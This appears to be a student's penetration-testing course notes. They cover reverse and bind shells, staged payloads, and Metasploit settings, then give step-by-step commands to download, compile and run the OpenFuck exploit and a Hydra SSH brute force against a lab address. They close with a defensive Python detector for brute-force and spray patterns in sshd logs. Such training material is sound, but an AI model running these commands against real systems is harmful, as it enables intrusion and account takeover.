Reverse Shells vs Bind Shells
The most common shell is a reverse shell.
A shell is access to a machine. Popping a shell means getting access to a machine. A reverse shell means the target machine connects to us.
With a bind shell we open up a port on the target machine and connect to it.
Reverse shells are more common. (95%)
Bind shells are typical in external assessments.
Staged vs Non-Staged Payloads
A payload is what we run as an exploit.
The ‘/’ (forward slash) identifies a staged payload.
Gaining Root with Metasploit
set rhosts 192.168.57
The session dies (staged payload).
set payload linux/x86/shell_reverse_tcp
(set a non-staged payload)
1. Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
2. Install the ssl-dev library
apt-get install libssl-dev
3. It’s Compile Time
gcc -o OpenFuck OpenFuck.c -lcrypto
4. Running the Exploit
./OpenFuck 0x6b 192.168.57.134 -c 40
Brute Force Attacks
Bruteforcing SSH is typically not the low hanging fruit.
Still, there are three reasons for trying it:
- Testing password strength
- Testing if we can get in with a weak or default password
- Testing how well the blue team performs
Hydra is a brute-force tool.
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.57.134:22 -t 4 -V
set username root
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set rhosts 192.168.57.134
Credential Stuffing and Password Spraying
Credential stuffing is submitting breached account credentials in the hope of an account takeover.
Look for a status change in the results.
Add the response text to the grep match.
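From the blue-team side of the two sections above, here is an added example (not part of the original notes) that reads constructed sshd auth-log lines and separates a Hydra-style brute force (many failures against one account from one IP) from a password spray (one IP cycling through many accounts); the log format, thresholds and IPs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH "Failed password" line shape, as used in the constructed sample below
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

# Constructed sample auth.log (not real traffic): one brute-force source,
# one spraying source, one single-failure source, one success line
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[101]: Failed password for root from 10.0.0.5 port 50001 ssh2
Mar  3 10:00:02 host sshd[102]: Failed password for root from 10.0.0.5 port 50002 ssh2
Mar  3 10:00:03 host sshd[103]: Failed password for root from 10.0.0.5 port 50003 ssh2
Mar  3 10:00:04 host sshd[104]: Failed password for root from 10.0.0.5 port 50004 ssh2
Mar  3 10:00:05 host sshd[105]: Failed password for root from 10.0.0.5 port 50005 ssh2
Mar  3 10:00:06 host sshd[106]: Failed password for root from 10.0.0.5 port 50006 ssh2
Mar  3 10:01:00 host sshd[107]: Failed password for invalid user alice from 10.0.0.9 port 40001 ssh2
Mar  3 10:01:10 host sshd[108]: Failed password for invalid user bob from 10.0.0.9 port 40002 ssh2
Mar  3 10:01:20 host sshd[109]: Failed password for carol from 10.0.0.9 port 40003 ssh2
Mar  3 10:01:30 host sshd[110]: Failed password for invalid user dave from 10.0.0.9 port 40004 ssh2
Mar  3 10:01:40 host sshd[111]: Failed password for erin from 10.0.0.9 port 40005 ssh2
Mar  3 12:30:00 host sshd[112]: Failed password for root from 10.0.0.7 port 30001 ssh2
Mar  3 12:30:01 host sshd[113]: Accepted password for root from 10.0.0.7 port 30002 ssh2
"""

def parse_failures(text, year=2024):
    """Yield (timestamp, user, ip) for every failed-password line; syslog lacks the year."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect(text, window_s=120, bf_threshold=5, spray_users=4):
    """Return {ip: 'bruteforce' | 'spray'} using a sliding window per source IP:
    >= bf_threshold failures on a single account -> bruteforce,
    >= spray_users distinct accounts in one window -> spray."""
    events = defaultdict(list)
    for ts, user, ip in parse_failures(text):
        events[ip].append((ts, user))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            win = [u for t, u in evs[i:] if (t - start).total_seconds() <= window_s]
            if len(win) >= bf_threshold and len(set(win)) == 1:
                findings[ip] = "bruteforce"
            elif len(set(win)) >= spray_users:
                findings[ip] = "spray"
    return findings
```

Tune `window_s` and the thresholds to the host's normal failure rate; a below-threshold source such as 10.0.0.7 produces no finding.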